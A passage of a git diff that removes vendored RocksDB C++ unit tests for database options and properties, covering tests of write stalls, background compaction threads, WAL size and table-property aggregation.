-      options.write_buffer_size = 1024 * 1024 * 10;
-      options.compression = CompressionType::kNoCompression;
-      options.level0_file_num_compaction_trigger = 1;
-      options.level0_stop_writes_trigger = std::numeric_limits<int>::max();
-      options.level0_slowdown_writes_trigger = std::numeric_limits<int>::max();
-      options.hard_pending_compaction_bytes_limit =
-          std::numeric_limits<uint64_t>::max();
-      options.soft_pending_compaction_bytes_limit =
-          std::numeric_limits<uint64_t>::max();
-      options.env = env_;
-
-      DestroyAndReopen(options);
-      int i = 0;
-      for (; i < 1024; i++) {
-        Put(Key(i), kValue);
-      }
-      Flush();
-      for (; i < 1024 * 2; i++) {
-        Put(Key(i), kValue);
-      }
-      Flush();
-      dbfull()->TEST_WaitForFlushMemTable();
-      ASSERT_EQ(2, NumTableFilesAtLevel(0));
-      uint64_t l0_size = SizeAtLevel(0);
-
-      switch (option_type) {
-        case 0:
-          // test with level0_stop_writes_trigger
-          options.level0_stop_writes_trigger = 2;
-          options.level0_slowdown_writes_trigger = 2;
-          break;
-        case 1:
-          options.level0_slowdown_writes_trigger = 2;
-          break;
-        case 2:
-          options.hard_pending_compaction_bytes_limit = l0_size;
-          options.soft_pending_compaction_bytes_limit = l0_size;
-          break;
-        case 3:
-          options.soft_pending_compaction_bytes_limit = l0_size;
-          break;
-      }
-      Reopen(options);
-      dbfull()->TEST_WaitForCompact();
-      ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-      ASSERT_FALSE(dbfull()->TEST_write_controler().NeedsDelay());
-
-      SyncPoint::GetInstance()->LoadDependency(
-          {{"DBOptionsTest::EnableAutoCompactionAndTriggerStall:1",
-            "BackgroundCallCompaction:0"},
-           {"DBImpl::BackgroundCompaction():BeforePickCompaction",
-            "DBOptionsTest::EnableAutoCompactionAndTriggerStall:2"},
-           {"DBOptionsTest::EnableAutoCompactionAndTriggerStall:3",
-            "DBImpl::BackgroundCompaction():AfterPickCompaction"}});
-      // Block background compaction.
-      SyncPoint::GetInstance()->EnableProcessing();
-
-      switch (method_type) {
-        case 0:
-          ASSERT_OK(
-              dbfull()->SetOptions({{"disable_auto_compactions", "false"}}));
-          break;
-        case 1:
-          ASSERT_OK(dbfull()->EnableAutoCompaction(
-              {dbfull()->DefaultColumnFamily()}));
-          break;
-      }
-      TEST_SYNC_POINT("DBOptionsTest::EnableAutoCompactionAndTriggerStall:1");
-      // Wait for stall condition recalculate.
-      TEST_SYNC_POINT("DBOptionsTest::EnableAutoCompactionAndTriggerStall:2");
-
-      switch (option_type) {
-        case 0:
-          ASSERT_TRUE(dbfull()->TEST_write_controler().IsStopped());
-          break;
-        case 1:
-          ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-          ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-          break;
-        case 2:
-          ASSERT_TRUE(dbfull()->TEST_write_controler().IsStopped());
-          break;
-        case 3:
-          ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-          ASSERT_TRUE(dbfull()->TEST_write_controler().NeedsDelay());
-          break;
-      }
-      TEST_SYNC_POINT("DBOptionsTest::EnableAutoCompactionAndTriggerStall:3");
-
-      // Background compaction executed.
-      dbfull()->TEST_WaitForCompact();
-      ASSERT_FALSE(dbfull()->TEST_write_controler().IsStopped());
-      ASSERT_FALSE(dbfull()->TEST_write_controler().NeedsDelay());
-    }
-  }
-}
-
-TEST_F(DBOptionsTest, SetOptionsMayTriggerCompaction) {
-  Options options;
-  options.create_if_missing = true;
-  options.level0_file_num_compaction_trigger = 1000;
-  options.env = env_;
-  Reopen(options);
-  for (int i = 0; i < 3; i++) {
-    // Need to insert two keys to avoid trivial move.
-    ASSERT_OK(Put("foo", ToString(i)));
-    ASSERT_OK(Put("bar", ToString(i)));
-    Flush();
-  }
-  ASSERT_EQ("3", FilesPerLevel());
-  ASSERT_OK(
-      dbfull()->SetOptions({{"level0_file_num_compaction_trigger", "3"}}));
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("0,1", FilesPerLevel());
-}
-
-TEST_F(DBOptionsTest, SetBackgroundCompactionThreads) {
-  Options options;
-  options.create_if_missing = true;
-  options.max_background_compactions = 1;   // default value
-  options.env = env_;
-  Reopen(options);
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-  ASSERT_OK(dbfull()->SetDBOptions({{"max_background_compactions", "3"}}));
-  ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-  auto stop_token = dbfull()->TEST_write_controler().GetStopToken();
-  ASSERT_EQ(3, dbfull()->TEST_BGCompactionsAllowed());
-}
-
-TEST_F(DBOptionsTest, SetBackgroundJobs) {
-  Options options;
-  options.create_if_missing = true;
-  options.max_background_jobs = 8;
-  options.env = env_;
-  Reopen(options);
-
-  for (int i = 0; i < 2; ++i) {
-    if (i > 0) {
-      options.max_background_jobs = 12;
-      ASSERT_OK(dbfull()->SetDBOptions(
-          {{"max_background_jobs",
-            std::to_string(options.max_background_jobs)}}));
-    }
-
-    ASSERT_EQ(options.max_background_jobs / 4,
-              dbfull()->TEST_BGFlushesAllowed());
-    ASSERT_EQ(1, dbfull()->TEST_BGCompactionsAllowed());
-
-    auto stop_token = dbfull()->TEST_write_controler().GetStopToken();
-
-    ASSERT_EQ(options.max_background_jobs / 4,
-              dbfull()->TEST_BGFlushesAllowed());
-    ASSERT_EQ(3 * options.max_background_jobs / 4,
-              dbfull()->TEST_BGCompactionsAllowed());
-  }
-}
-
-TEST_F(DBOptionsTest, AvoidFlushDuringShutdown) {
-  Options options;
-  options.create_if_missing = true;
-  options.disable_auto_compactions = true;
-  options.env = env_;
-  WriteOptions write_without_wal;
-  write_without_wal.disableWAL = true;
-
-  ASSERT_FALSE(options.avoid_flush_during_shutdown);
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo", "v1", write_without_wal));
-  Reopen(options);
-  ASSERT_EQ("v1", Get("foo"));
-  ASSERT_EQ("1", FilesPerLevel());
-
-  DestroyAndReopen(options);
-  ASSERT_OK(Put("foo", "v2", write_without_wal));
-  ASSERT_OK(dbfull()->SetDBOptions({{"avoid_flush_during_shutdown", "true"}}));
-  Reopen(options);
-  ASSERT_EQ("NOT_FOUND", Get("foo"));
-  ASSERT_EQ("", FilesPerLevel());
-}
-
-TEST_F(DBOptionsTest, SetDelayedWriteRateOption) {
-  Options options;
-  options.create_if_missing = true;
-  options.delayed_write_rate = 2 * 1024U * 1024U;
-  options.env = env_;
-  Reopen(options);
-  ASSERT_EQ(2 * 1024U * 1024U, dbfull()->TEST_write_controler().max_delayed_write_rate());
-
-  ASSERT_OK(dbfull()->SetDBOptions({{"delayed_write_rate", "20000"}}));
-  ASSERT_EQ(20000, dbfull()->TEST_write_controler().max_delayed_write_rate());
-}
-
-TEST_F(DBOptionsTest, MaxTotalWalSizeChange) {
-  Random rnd(1044);
-  const auto value_size = size_t(1024);
-  std::string value;
-  test::RandomString(&rnd, value_size, &value);
-
-  Options options;
-  options.create_if_missing = true;
-  options.env = env_;
-  CreateColumnFamilies({"1", "2", "3"}, options);
-  ReopenWithColumnFamilies({"default", "1", "2", "3"}, options);
-
-  WriteOptions write_options;
-
-  const int key_count = 100;
-  for (int i = 0; i < key_count; ++i) {
-    for (size_t cf = 0; cf < handles_.size(); ++cf) {
-      ASSERT_OK(Put(static_cast<int>(cf), Key(i), value));
-    }
-  }
-  ASSERT_OK(dbfull()->SetDBOptions({{"max_total_wal_size", "10"}}));
-
-  for (size_t cf = 0; cf < handles_.size(); ++cf) {
-    dbfull()->TEST_WaitForFlushMemTable(handles_[cf]);
-    ASSERT_EQ("1", FilesPerLevel(static_cast<int>(cf)));
-  }
-}
-
-TEST_F(DBOptionsTest, SetStatsDumpPeriodSec) {
-  Options options;
-  options.create_if_missing = true;
-  options.stats_dump_period_sec = 5;
-  options.env = env_;
-  Reopen(options);
-  ASSERT_EQ(5, dbfull()->GetDBOptions().stats_dump_period_sec);
-
-  for (int i = 0; i < 20; i++) {
-    int num = rand() % 5000 + 1;
-    ASSERT_OK(dbfull()->SetDBOptions(
-        {{"stats_dump_period_sec", std::to_string(num)}}));
-    ASSERT_EQ(num, dbfull()->GetDBOptions().stats_dump_period_sec);
-  }
-}
-
-static void assert_candidate_files_empty(DBImpl* dbfull, const bool empty) {
-  dbfull->TEST_LockMutex();
-  JobContext job_context(0);
-  dbfull->FindObsoleteFiles(&job_context, false);
-  ASSERT_EQ(empty, job_context.full_scan_candidate_files.empty());
-  job_context.Clean();
-  dbfull->TEST_UnlockMutex();
-}
-
-TEST_F(DBOptionsTest, DeleteObsoleteFilesPeriodChange) {
-  SpecialEnv env(env_);
-  env.time_elapse_only_sleep_ = true;
-  Options options;
-  options.env = &env;
-  options.create_if_missing = true;
-  ASSERT_OK(TryReopen(options));
-
-  // Verify that candidate files set is empty when no full scan requested.
-  assert_candidate_files_empty(dbfull(), true);
-
-  ASSERT_OK(
-      dbfull()->SetDBOptions({{"delete_obsolete_files_period_micros", "0"}}));
-
-  // After delete_obsolete_files_period_micros updated to 0, the next call
-  // to FindObsoleteFiles should make a full scan
-  assert_candidate_files_empty(dbfull(), false);
-
-  ASSERT_OK(
-      dbfull()->SetDBOptions({{"delete_obsolete_files_period_micros", "20"}}));
-
-  assert_candidate_files_empty(dbfull(), true);
-
-  env.addon_time_.store(20);
-  assert_candidate_files_empty(dbfull(), true);
-
-  env.addon_time_.store(21);
-  assert_candidate_files_empty(dbfull(), false);
-
-  Close();
-}
-
-TEST_F(DBOptionsTest, MaxOpenFilesChange) {
-  SpecialEnv env(env_);
-  Options options;
-  options.env = CurrentOptions().env;
-  options.max_open_files = -1;
-
-  Reopen(options);
-
-  Cache* tc = dbfull()->TEST_table_cache();
-
-  ASSERT_EQ(-1, dbfull()->GetDBOptions().max_open_files);
-  ASSERT_LT(2000, tc->GetCapacity());
-  ASSERT_OK(dbfull()->SetDBOptions({{"max_open_files", "1024"}}));
-  ASSERT_EQ(1024, dbfull()->GetDBOptions().max_open_files);
-  // examine the table cache (actual size should be 1014)
-  ASSERT_GT(1500, tc->GetCapacity());
-  Close();
-}
-
-TEST_F(DBOptionsTest, SanitizeDelayedWriteRate) {
-  Options options;
-  options.delayed_write_rate = 0;
-  Reopen(options);
-  ASSERT_EQ(16 * 1024 * 1024, dbfull()->GetDBOptions().delayed_write_rate);
-
-  options.rate_limiter.reset(NewGenericRateLimiter(31 * 1024 * 1024));
-  Reopen(options);
-  ASSERT_EQ(31 * 1024 * 1024, dbfull()->GetDBOptions().delayed_write_rate);
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_properties_test.cc b/thirdparty/rocksdb/db/db_properties_test.cc
deleted file mode 100644
index 0da64b1..0000000
--- a/thirdparty/rocksdb/db/db_properties_test.cc
+++ /dev/null
@@ -1,1393 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include <stdio.h>
-
-#include <algorithm>
-#include <string>
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/perf_level.h"
-#include "rocksdb/table.h"
-#include "util/random.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-class DBPropertiesTest : public DBTestBase {
- public:
-  DBPropertiesTest() : DBTestBase("/db_properties_test") {}
-};
-
-#ifndef ROCKSDB_LITE
-TEST_F(DBPropertiesTest, Empty) {
-  do {
-    Options options;
-    options.env = env_;
-    options.write_buffer_size = 100000;  // Small write buffer
-    options.allow_concurrent_memtable_write = false;
-    options = CurrentOptions(options);
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    std::string num;
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("0", num);
-
-    ASSERT_OK(Put(1, "foo", "v1"));
-    ASSERT_EQ("v1", Get(1, "foo"));
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("1", num);
-
-    // Block sync calls
-    env_->delay_sstable_sync_.store(true, std::memory_order_release);
-    Put(1, "k1", std::string(100000, 'x'));  // Fill memtable
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("2", num);
-
-    Put(1, "k2", std::string(100000, 'y'));  // Trigger compaction
-    ASSERT_TRUE(dbfull()->GetProperty(
-        handles_[1], "rocksdb.num-entries-active-mem-table", &num));
-    ASSERT_EQ("1", num);
-
-    ASSERT_EQ("v1", Get(1, "foo"));
-    // Release sync calls
-    env_->delay_sstable_sync_.store(false, std::memory_order_release);
-
-    ASSERT_OK(db_->DisableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("1", num);
-
-    ASSERT_OK(db_->DisableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("2", num);
-
-    ASSERT_OK(db_->DisableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("3", num);
-
-    ASSERT_OK(db_->EnableFileDeletions(false));
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("2", num);
-
-    ASSERT_OK(db_->EnableFileDeletions());
-    ASSERT_TRUE(
-        dbfull()->GetProperty("rocksdb.is-file-deletions-enabled", &num));
-    ASSERT_EQ("0", num);
-  } while (ChangeOptions());
-}
-
-TEST_F(DBPropertiesTest, CurrentVersionNumber) {
-  uint64_t v1, v2, v3;
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.current-super-version-number", &v1));
-  Put("12345678", "");
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.current-super-version-number", &v2));
-  Flush();
-  ASSERT_TRUE(
-      dbfull()->GetIntProperty("rocksdb.current-super-version-number", &v3));
-
-  ASSERT_EQ(v1, v2);
-  ASSERT_GT(v3, v2);
-}
-
-TEST_F(DBPropertiesTest, GetAggregatedIntPropertyTest) {
-  const int kKeySize = 100;
-  const int kValueSize = 500;
-  const int kKeyNum = 100;
-
-  Options options;
-  options.env = env_;
-  options.create_if_missing = true;
-  options.write_buffer_size = (kKeySize + kValueSize) * kKeyNum / 10;
-  // Make them never flush
-  options.min_write_buffer_number_to_merge = 1000;
-  options.max_write_buffer_number = 1000;
-  options = CurrentOptions(options);
-  CreateAndReopenWithCF({"one", "two", "three", "four"}, options);
-
-  Random rnd(301);
-  for (auto* handle : handles_) {
-    for (int i = 0; i < kKeyNum; ++i) {
-      db_->Put(WriteOptions(), handle, RandomString(&rnd, kKeySize),
-               RandomString(&rnd, kValueSize));
-    }
-  }
-
-  uint64_t manual_sum = 0;
-  uint64_t api_sum = 0;
-  uint64_t value = 0;
-  for (auto* handle : handles_) {
-    ASSERT_TRUE(
-        db_->GetIntProperty(handle, DB::Properties::kSizeAllMemTables, &value));
-    manual_sum += value;
-  }
-  ASSERT_TRUE(db_->GetAggregatedIntProperty(DB::Properties::kSizeAllMemTables,
-                                            &api_sum));
-  ASSERT_GT(manual_sum, 0);
-  ASSERT_EQ(manual_sum, api_sum);
-
-  ASSERT_FALSE(db_->GetAggregatedIntProperty(DB::Properties::kDBStats, &value));
-
-  uint64_t before_flush_trm;
-  uint64_t after_flush_trm;
-  for (auto* handle : handles_) {
-    ASSERT_TRUE(db_->GetAggregatedIntProperty(
-        DB::Properties::kEstimateTableReadersMem, &before_flush_trm));
-
-    // Issue flush and expect larger memory usage of table readers.
-    db_->Flush(FlushOptions(), handle);
-
-    ASSERT_TRUE(db_->GetAggregatedIntProperty(
-        DB::Properties::kEstimateTableReadersMem, &after_flush_trm));
-    ASSERT_GT(after_flush_trm, before_flush_trm);
-  }
-}
-
-namespace {
-void ResetTableProperties(TableProperties* tp) {
-  tp->data_size = 0;
-  tp->index_size = 0;
-  tp->filter_size = 0;
-  tp->raw_key_size = 0;
-  tp->raw_value_size = 0;
-  tp->num_data_blocks = 0;
-  tp->num_entries = 0;
-}
-
-void ParseTablePropertiesString(std::string tp_string, TableProperties* tp) {
-  double dummy_double;
-  std::replace(tp_string.begin(), tp_string.end(), ';', ' ');
-  std::replace(tp_string.begin(), tp_string.end(), '=', ' ');
-  ResetTableProperties(tp);
-
-  sscanf(tp_string.c_str(),
-         "# data blocks %" SCNu64 " # entries %" SCNu64 " raw key size %" SCNu64
-         " raw average key size %lf "
-         " raw value size %" SCNu64
-         " raw average value size %lf "
-         " data block size %" SCNu64 " index block size %" SCNu64
-         " filter block size %" SCNu64,
-         &tp->num_data_blocks, &tp->num_entries, &tp->raw_key_size,
-         &dummy_double, &tp->raw_value_size, &dummy_double, &tp->data_size,
-         &tp->index_size, &tp->filter_size);
-}
-
-void VerifySimilar(uint64_t a, uint64_t b, double bias) {
-  ASSERT_EQ(a == 0U, b == 0U);
-  if (a == 0) {
-    return;
-  }
-  double dbl_a = static_cast<double>(a);
-  double dbl_b = static_cast<double>(b);
-  if (dbl_a > dbl_b) {
-    ASSERT_LT(static_cast<double>(dbl_a - dbl_b) / (dbl_a + dbl_b), bias);
-  } else {
-    ASSERT_LT(static_cast<double>(dbl_b - dbl_a) / (dbl_a + dbl_b), bias);
-  }
-}
-
-void VerifyTableProperties(const TableProperties& base_tp,
-                           const TableProperties& new_tp,
-                           double filter_size_bias = 0.1,
-                           double index_size_bias = 0.1,
-                           double data_size_bias = 0.1,
-                           double num_data_blocks_bias = 0.05) {
-  VerifySimilar(base_tp.data_size, new_tp.data_size, data_size_bias);
-  VerifySimilar(base_tp.index_size, new_tp.index_size, index_size_bias);
-  VerifySimilar(base_tp.filter_size, new_tp.filter_size, filter_size_bias);
-  VerifySimilar(base_tp.num_data_blocks, new_tp.num_data_blocks,
-                num_data_blocks_bias);
-  ASSERT_EQ(base_tp.raw_key_size, new_tp.raw_key_size);
-  ASSERT_EQ(base_tp.raw_value_size, new_tp.raw_value_size);
-  ASSERT_EQ(base_tp.num_entries, new_tp.num_entries);
-}
-
-void GetExpectedTableProperties(TableProperties* expected_tp,
-                                const int kKeySize, const int kValueSize,
-                                const int kKeysPerTable, const int kTableCount,
-                                const int kBloomBitsPerKey,
-                                const size_t kBlockSize) {
-  const int kKeyCount = kTableCount * kKeysPerTable;
-  const int kAvgSuccessorSize = kKeySize / 5;
-  const int kEncodingSavePerKey = kKeySize / 4;
-  expected_tp->raw_key_size = kKeyCount * (kKeySize + 8);
-  expected_tp->raw_value_size = kKeyCount * kValueSize;
-  expected_tp->num_entries = kKeyCount;
-  expected_tp->num_data_blocks =
-      kTableCount *
-      (kKeysPerTable * (kKeySize - kEncodingSavePerKey + kValueSize)) /
-      kBlockSize;
-  expected_tp->data_size =
-      kTableCount * (kKeysPerTable * (kKeySize + 8 + kValueSize));
-  expected_tp->index_size =
-      expected_tp->num_data_blocks * (kAvgSuccessorSize + 8);
-  expected_tp->filter_size =
-      kTableCount * (kKeysPerTable * kBloomBitsPerKey / 8);
-}
-}  // anonymous namespace
-
-TEST_F(DBPropertiesTest, ValidatePropertyInfo) {
-  for (const auto& ppt_name_and_info : InternalStats::ppt_name_to_info) {
-    // If C++ gets a std::string_literal, this would be better to check at
-    // compile-time using static_assert.
-    ASSERT_TRUE(ppt_name_and_info.first.empty() ||
-                !isdigit(ppt_name_and_info.first.back()));
-
-    ASSERT_TRUE((ppt_name_and_info.second.handle_string == nullptr) !=
-                (ppt_name_and_info.second.handle_int == nullptr));
-  }
-}
-
-TEST_F(DBPropertiesTest, ValidateSampleNumber) {
-  // When "max_open_files" is -1, we read all the files for
-  // "rocksdb.estimate-num-keys" computation, which is the ground truth.
-  // Otherwise, we sample 20 newest files to make an estimation.
-  // Formula: lastest_20_files_active_key_ratio * total_files
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  options.level0_stop_writes_trigger = 1000;
-  DestroyAndReopen(options);
-  int key = 0;
-  for (int files = 20; files >= 10; files -= 10) {
-    for (int i = 0; i < files; i++) {
-      int rows = files / 10;
-      for (int j = 0; j < rows; j++) {
-        db_->Put(WriteOptions(), std::to_string(++key), "foo");
-      }
-      db_->Flush(FlushOptions());
-    }
-  }
-  std::string num;
-  Reopen(options);
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ("45", num);
-  options.max_open_files = -1;
-  Reopen(options);
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.estimate-num-keys", &num));
-  ASSERT_EQ("50", num);
-}
-
-TEST_F(DBPropertiesTest, AggregatedTableProperties) {
-  for (int kTableCount = 40; kTableCount <= 100; kTableCount += 30) {
-    const int kKeysPerTable = 100;
-    const int kKeySize = 80;
-    const int kValueSize = 200;
-    const int kBloomBitsPerKey = 20;
-
-    Options options = CurrentOptions();
-    options.level0_file_num_compaction_trigger = 8;
-    options.compression = kNoCompression;
-    options.create_if_missing = true;
-
-    BlockBasedTableOptions table_options;
-    table_options.filter_policy.reset(
-        NewBloomFilterPolicy(kBloomBitsPerKey, false));
-    table_options.block_size = 1024;
-    options.table_factory.reset(new BlockBasedTableFactory(table_options));
-
-    DestroyAndReopen(options);
-
-    Random rnd(5632);
-    for (int table = 1; table <= kTableCount; ++table) {
-      for (int i = 0; i < kKeysPerTable; ++i) {
-        db_->Put(WriteOptions(), RandomString(&rnd, kKeySize),
-                 RandomString(&rnd, kValueSize));
-      }
-      db_->Flush(FlushOptions());
-    }
-    std::string property;
-    db_->GetProperty(DB::Properties::kAggregatedTableProperties, &property);
-
-    TableProperties expected_tp;
-    GetExpectedTableProperties(&expected_tp, kKeySize, kValueSize,
-                               kKeysPerTable, kTableCount, kBloomBitsPerKey,
-                               table_options.block_size);
-
-    TableProperties output_tp;
-    ParseTablePropertiesString(property, &output_tp);
-
-    VerifyTableProperties(expected_tp, output_tp);
-  }
-}
-
-TEST_F(DBPropertiesTest, ReadLatencyHistogramByLevel) {
-  Options options = CurrentOptions();
-  options.write_buffer_size = 110 << 10;
-  options.level0_file_num_compaction_trigger = 6;
-  options.num_levels = 4;
-  options.compression = kNoCompression;
-  options.max_bytes_for_level_base = 4500 << 10;
-  options.target_file_size_base = 98 << 10;
-  options.max_write_buffer_number = 2;
-  options.statistics = rocksdb::CreateDBStatistics();
-  options.max_open_files = 100;
-
-  BlockBasedTableOptions table_options;
-  table_options.no_block_cache = true;
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-  int key_index = 0;
-  Random rnd(301);
-  for (int num = 0; num < 8; num++) {
-    Put("foo", "bar");
-    GenerateNewFile(&rnd, &key_index);
-    dbfull()->TEST_WaitForCompact();
-  }
-  dbfull()->TEST_WaitForCompact();
-
-  std::string prop;
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.dbstats", &prop));
-
-  // Get() after flushes, See latency histogram tracked.
-  for (int key = 0; key < key_index; key++) {
-    Get(Key(key));
-  }
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cfstats", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // Reopen and issue Get(). See thee latency tracked
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  dbfull()->TEST_WaitForCompact();
-  for (int key = 0; key < key_index; key++) {
-    Get(Key(key));
-  }
-  ASSERT_TRUE(dbfull()->GetProperty(dbfull()->DefaultColumnFamily(),
-                                    "rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // Reopen and issue iterating. See thee latency tracked
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cf-file-histogram", &prop));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-  {
-    unique_ptr<Iterator> iter(db_->NewIterator(ReadOptions()));
-    for (iter->Seek(Key(0)); iter->Valid(); iter->Next()) {
-    }
-  }
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // CF 1 should show no histogram.
-  ASSERT_TRUE(
-      dbfull()->GetProperty(handles_[1], "rocksdb.cf-file-histogram", &prop));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-  // put something and read it back , CF 1 should show histogram.
-  Put(1, "foo", "bar");
-  Flush(1);
-  dbfull()->TEST_WaitForCompact();
-  ASSERT_EQ("bar", Get(1, "foo"));
-
-  ASSERT_TRUE(
-      dbfull()->GetProperty(handles_[1], "rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // options.max_open_files preloads table readers.
-  options.max_open_files = -1;
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-  ASSERT_TRUE(dbfull()->GetProperty(dbfull()->DefaultColumnFamily(),
-                                    "rocksdb.cf-file-histogram", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-  for (int key = 0; key < key_index; key++) {
-    Get(Key(key));
-  }
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cfstats", &prop));
-  ASSERT_NE(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_NE(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-
-  // Clear internal stats
-  dbfull()->ResetStats();
-  ASSERT_TRUE(dbfull()->GetProperty("rocksdb.cfstats", &prop));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 0 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 1 read latency histogram"));
-  ASSERT_EQ(std::string::npos, prop.find("** Level 2 read latency histogram"));
-}
-
-TEST_F(DBPropertiesTest, AggregatedTablePropertiesAtLevel) {
-  const int kTableCount = 100;
-  const int kKeysPerTable = 10;
-  const int kKeySize = 50;
-  const int kValueSize = 400;
-  const int kMaxLevel = 7;
-  const int kBloomBitsPerKey = 20;
-  Random rnd(301);
-  Options options = CurrentOptions();
-  options.level0_file_num_compaction_trigger = 8;
-  options.compression = kNoCompression;
-  options.create_if_missing = true;
-  options.level0_file_num_compaction_trigger = 2;
-  options.target_file_size_base = 8192;
-  options.max_bytes_for_level_base = 10000;
-  options.max_bytes_for_level_multiplier = 2;
-  // This ensures there no compaction happening when we call GetProperty().
-  options.disable_auto_compactions = true;
-
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(
-      NewBloomFilterPolicy(kBloomBitsPerKey, false));
-  table_options.block_size = 1024;
-  options.table_factory.reset(new BlockBasedTableFactory(table_options));
-
-  DestroyAndReopen(options);
-
-  std::string level_tp_strings[kMaxLevel];
-  std::string tp_string;
-  TableProperties level_tps[kMaxLevel];
-  TableProperties tp, sum_tp, expected_tp;
-  for (int table = 1; table <= kTableCount; ++table) {
-    for (int i = 0; i < kKeysPerTable; ++i) {
-      db_->Put(WriteOptions(), RandomString(&rnd, kKeySize),
-               RandomString(&rnd, kValueSize));
-    }
-    db_->Flush(FlushOptions());
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-    ResetTableProperties(&sum_tp);
-    for (int level = 0; level < kMaxLevel; ++level) {
-      db_->GetProperty(
-          DB::Properties::kAggregatedTablePropertiesAtLevel + ToString(level),
-          &level_tp_strings[level]);
-      ParseTablePropertiesString(level_tp_strings[level], &level_tps[level]);
-      sum_tp.data_size += level_tps[level].data_size;
-      sum_tp.index_size += level_tps[level].index_size;
-      sum_tp.filter_size += level_tps[level].filter_size;
-      sum_tp.raw_key_size += level_tps[level].raw_key_size;
-      sum_tp.raw_value_size += level_tps[level].raw_value_size;
-      sum_tp.num_data_blocks += level_tps[level].num_data_blocks;
-      sum_tp.num_entries += level_tps[level].num_entries;
-    }
-    db_->GetProperty(DB::Properties::kAggregatedTableProperties, &tp_string);
